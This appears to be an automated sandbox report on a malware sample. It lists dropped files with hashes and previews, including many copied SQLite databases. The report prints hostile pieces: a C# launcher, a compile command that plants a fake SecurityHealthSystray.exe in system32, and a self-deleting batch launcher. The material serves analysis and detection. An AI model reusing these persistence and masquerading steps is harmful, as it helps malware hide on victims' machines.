C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Mscommon.exe.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1915
Entropy (8bit):	5.363869398054153
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
MD5:	0C47412B6C6EF6C70D4B96E4717A5D3B
SHA1:	666FCC7898B52264D8A144600D7A3B0B59E39D66
SHA-256:	0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
SHA-512:	4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\cmd.exe.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ruRRsbcJNKBbiFjvLZZICNpuYz.exe.log

Download File

Process:	C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Temp\0yLek9GHpw

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3kIFDem3qM

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9DXwxxN5xZ

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Bon7bPg1Bs

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\HQpFbFXNbc

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\I9zdDykFVb

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\KkWX4W0WBB

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\PKzrz8euGM

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RESDDA4.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Fri Jan 3 21:13:36 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1956
Entropy (8bit):	4.549812733316226
Encrypted:	false
SSDEEP:	24:HhO9/O4mKDfH3YwKG5TYN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:L4mQXKG5syluOulajfqXSfbNtmh1Z
MD5:	1656F913E875404359F52FA4AB5418AF
SHA1:	EF36C707DA1D454852D028D1DCD3884295CF4A85
SHA-256:	D0033ED4AA34D05878AFA6AB1C6479ED33BD17CD4C200E37F357C624FFD08CAF
SHA-512:	080373414495C629CE4751DCCA3E9E59F44AEDA2C1F8B2269FCAD31A8F2F07AEA988EDA52CA2254694B8AF714735C994BC68D9B7B702FD5EF92D859562DACA51
Malicious:	false
Preview:	L....Sxg.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...\|...............@..@........=....c:\Windows\System32\CSCA9C827E8660941B2BE855526E0709AE4.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESDDA4.tmp.-.<....................a..Microsoft (R) CVTRES.a.=..cwd.C:\hyperComponentFontDhcp.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

C:\Users\user\AppData\Local\Temp\Y18EjNxF0O

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\axQi1rMT10

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.0.cs

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	394
Entropy (8bit):	4.906911551284251
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLE9riFkD:JNVQIbSfhV7TiFkMSfho9mFkD
MD5:	19C0EF52F59CFEB83693793F73DBEC59
SHA1:	D2D68600F82FE9B87020596CE558117B3C3D4145
SHA-256:	8BF3619071B3FC8AE6910A87C25E7035F90C5C55C4D969C352E716C5AFA2353B
SHA-512:	4F05471096171632C9E8513E6B8C2382143832FDCDAA852F3050B634659D2B3B4877C984F2F2FE2FC88C15D23B8EDABC7A2C0F1C951D92CD4429F34A99A99ECC
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\All Users\SoftwareDistribution\cmd.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	250
Entropy (8bit):	5.030109533035278
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fzlQA:Hu7L//TRq79cQWfBb
MD5:	A644280DBFD86D3F364B57308D3FA377
SHA1:	5F85272CF73EDF6DD884B153C8EF8B3217444426
SHA-256:	792BA849060C8586AC766284E5B0317C2CA73546298D789765143628B60A207A
SHA-512:	D900260A833E5630102F53448C4C91C00E00F8F275A3A8AEDB2856C29F8172CE35532E4D03811636FD45E65A9899E8B2B18068A93A0837C363EC20F3564532B0
Malicious:	true
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.0.cs"

C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.out

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (332), with CRLF, CR line terminators
Category:	modified
Size (bytes):	753
Entropy (8bit):	5.238592505990335
Encrypted:	false
SSDEEP:	12:55wI/u7L//TRq79cQWfBaKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:55wI/un/Vq79tWfBaKax5DqBVKVrdFAw
MD5:	5A452BF2469A4061B183C402986BB40B
SHA1:	BAFF4EBF4B54D38F20576D543F2B191F7D40780F
SHA-256:	3B0E06E0C5C9994DA5E617AD29FEBAB1B25255D471BE2CA6C034103DBFEC9425
SHA-512:	8D114C4F0EDBF5CAC339E6CCA15582D1288C8C0FB8CB671EA25422ED8178BA455AA9CD37F009B2441E64C0977CA596695B5AE950560EFE2974E59C58A4CDB692
Malicious:	false
Preview:	.C:\hyperComponentFontDhcp> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\hDzLl02r25

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\m0b2of10Rz

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\mjkBmYMbQH

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:U/dHhrji:Up1i
MD5:	086ABD78FB7579654431420E1C2272CD
SHA1:	F1101FD98CFA045D3D37C49DEC1AAC1C03B73736
SHA-256:	881D33A886807D7018F2E11DAF50B68155B2CFA997EFD0F1F501E9E3459625A2
SHA-512:	F953AA07EB3699A376ED1E020E80F8B45F2A9EE41A6EA82F50B13BA0066FA1150657AA1E8D55A1EDA7834342926EF735F79B39BEE8198C2A3B62FB982C284729
Malicious:	false
Preview:	N32ZOCzbq7j9hkvVjxN0WgfZG

C:\Users\user\AppData\Local\Temp\nx7u18ycrY

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\oMjfMsD46e

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\qxQMjDgg8i.bat

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	193
Entropy (8bit):	5.464136040810033
Encrypted:	false
SSDEEP:	6:hCRLuVFOOr+DER5/eRMlk1vKOZG1wkn23fYx:CuVEOCDEf/3iDfs
MD5:	EFA6EBDAC60FEA4ECED43B37C9CEF95C
SHA1:	365E10F2468C0110DE5E9A08B8CA0A36CF95D3F4
SHA-256:	7550BAAC0C7C6D9A3CD9734FC787E942F5CB6F108D64D75753EA32162EEE0284
SHA-512:	1FFBC73861D08923E6169411968DC1438F1AE01C968625F0A231E93CFDA3C7965895E578EC0D0119811F7F6CA1705D6863205554BB211334A26ED1E66D4DCF7F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\qxQMjDgg8i.bat"

C:\Users\user\AppData\Local\Temp\thJKb5bR1t

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.373660689688184
Encrypted:	false
